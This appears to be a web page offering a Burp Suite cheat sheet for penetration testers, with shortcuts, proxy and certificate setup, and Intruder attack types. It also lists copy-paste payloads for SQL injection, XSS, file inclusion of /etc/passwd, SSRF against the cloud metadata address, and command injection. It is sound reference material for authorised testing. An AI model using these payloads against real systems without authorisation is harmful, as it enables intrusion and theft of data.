Burp Suite Cheat Sheet – Essential Web Security Tips

Burp Suite master cheat sheet for web penetration testing

Burp Suite Cheat Sheet 2026

The ultimate reference guide for bug bounty hunters and penetration testers

Keyboard Shortcuts

Mastering shortcuts is the fastest way to improve your workflow in Burp Suite.

Global Navigation

Windows / LinuxMacAction
Ctrl + Shift + DCmd + Shift + DSwitch to Dashboard
Ctrl + Shift + TCmd + Shift + TSwitch to Target
Ctrl + Shift + PCmd + Shift + PSwitch to Proxy
Ctrl + Shift + ICmd + Shift + ISwitch to Intruder
Ctrl + Shift + RCmd + Shift + RSwitch to Repeater

Proxy & Repeater Actions

ShortcutAction
Ctrl + FForward intercepted message
Ctrl + DDrop intercepted message
Ctrl + TToggle Interception On/Off
Ctrl + RSend to Repeater
Ctrl + ISend to Intruder
Ctrl + UURL Decode
Ctrl + Shift + UURL Encode

Proxy Configuration & CA Certificate

Getting Burp to intercept traffic correctly is step one. Here is the standard configuration.

Standard Listener Setup

  • Interface: 127.0.0.1:8080 (Default)
  • All Interfaces: 0.0.0.0:8080 (For mobile testing)

Installing CA Certificate

  1. Configure your browser to proxy through 127.0.0.1:8080.
  2. Visit http://burp in that browser.
  3. Click CA Certificate to download cacert.der.
  4. Firefox: Settings > Privacy & Security > Certificates > View Certificates > Import.
  5. Chrome/Windows: Double click file > Install Certificate > Trusted Root Certification Authorities.
  6. Android/iOS: Rename to cacert.crt and install via Security settings.

Scope Configuration

Always set your scope to avoid attacking unauthorized sites.

Target > Scope > Add > Advanced options
- Protocol: Any
- Host or IP: ^www\.target\.com$
- File: ^/api/v1/.*

Intruder Attack Types

Choose the right attack type based on how many payload positions you have.

TypeDescriptionUse Case
Sniper Uses one payload set. Puts payload into each position one by one. Fuzzing multiple parameters for the same vulnerability (e.g., XSS in all inputs).
Battering Ram Uses one payload set. Puts the SAME payload into ALL positions at once. Testing username/password fields where user=pass.
Pitchfork Uses multiple payload sets. Iterates them simultaneously (1-1, 2-2, 3-3). Credential stuffing (User List + Password List).
Cluster Bomb Uses multiple payload sets. Iterates every combination (Cartesian product). Brute forcing login forms (Try every password for every user).

Common Attack Payloads

Copy and paste these directly into Intruder or Repeater.

SQL Injection +
' OR 1=1 --
' UNION SELECT 1,version(),3 --
' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) --
admin' --
" OR "1"="1
1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
Cross-Site Scripting (XSS) +
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg/onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
" onfocus="alert(1)" autofocus="
Local File Inclusion (LFI) +
../../../../etc/passwd
....//....//....//etc/passwd
php://filter/convert.base64-encode/resource=index.php
file:///etc/passwd
/proc/self/environ
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
Server-Side Request Forgery (SSRF) +
http://127.0.0.1:80
http://localhost:22
http://169.254.169.254/latest/meta-data/
dict://127.0.0.1:11211/
file:///etc/passwd
http://[::]:80/
Command Injection +
; ls -la
| ls -la
& ls -la
$(ls -la)
`ls -la`
|| ping -c 1 127.0.0.1
; cat /etc/passwd

Repeater & Decoder Tricks

Repeater Workflow

  • Change Request Method: Right-click body > “Change request method” to swap GET/POST instantly.
  • Follow Redirects: Button at top right. Useful for login bypass testing.
  • Naming Tabs: Double-click tab headers to rename (e.g., “Login Flow”, “Admin API”) to stay organized.

Smart Decoding

The Inspector panel (right side) in Repeater automatically decodes selected text. You don’t always need to send to the Decoder tab.

Automation & Scripting

Use Python to drive Burp requests when Intruder isn’t enough.

Python Proxy Script

import requests

# Configure requests to use Burp Proxy
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080'
}

# Disable SSL warnings for self-signed certs
requests.packages.urllib3.disable_warnings()

target = "http://example.com/api/v1/user"

# Send request through Burp
response = requests.get(target, proxies=proxies, verify=False)

print(f"Status: {response.status_code}")
print(f"Body: {response.text[:100]}...")

Burp REST API

If automated scanning is enabled (Pro), you can trigger scans programmatically:

curl -X POST "http://localhost:1337/v0.1/scan" -d '{"urls":["http://target.com"]}'

Must-Have BApp Store Extensions

Enhance Burp’s capabilities with these top-rated extensions.

ExtensionFunctionBest For
Logger++Advanced logging with robust filters.Debugging complex flows.
AutorizeAutomated authorization enforcement detection.IDOR testing.
Turbo IntruderHigh-speed HTTP fuzzing via Python scripts.Rate limit testing, race conditions.
Retire.jsScans for vulnerable JavaScript libraries.Passive scanning.
JSON Web Token (JWT) EditorSign, verify, and modify JWTs.API security testing.
Active Scan++Adds more checks to the active scanner.Finding obscure vulnerabilities.
Param MinerFinds hidden, unlinked parameters.Web cache poisoning.

Pro Performance Tips

Memory Management

Burp can eat RAM. Edit your launch script to allocate more memory:

java -jar -Xmx4g burpsuite_pro.jar

Scope Control

Never test without setting a scope. It keeps your history clean and prevents legal issues.

  • Target > Scope: Check “Advanced scope control” for regex power.
  • Proxy > Options: Check “Don’t send items to Proxy history or live tasks, if out of scope”.

Handling TLS Errors

If a legacy app won’t connect through Burp:

  1. Go to Project options > SSL.
  2. Enable “Allow unsafe renegotiation”.
  3. Under “SSL Negotiation Workarounds”, try adding the specific host.

One thought on “Burp Suite Cheat Sheet – Essential Web Security Tips

Leave a Reply

Your email address will not be published. Required fields are marked *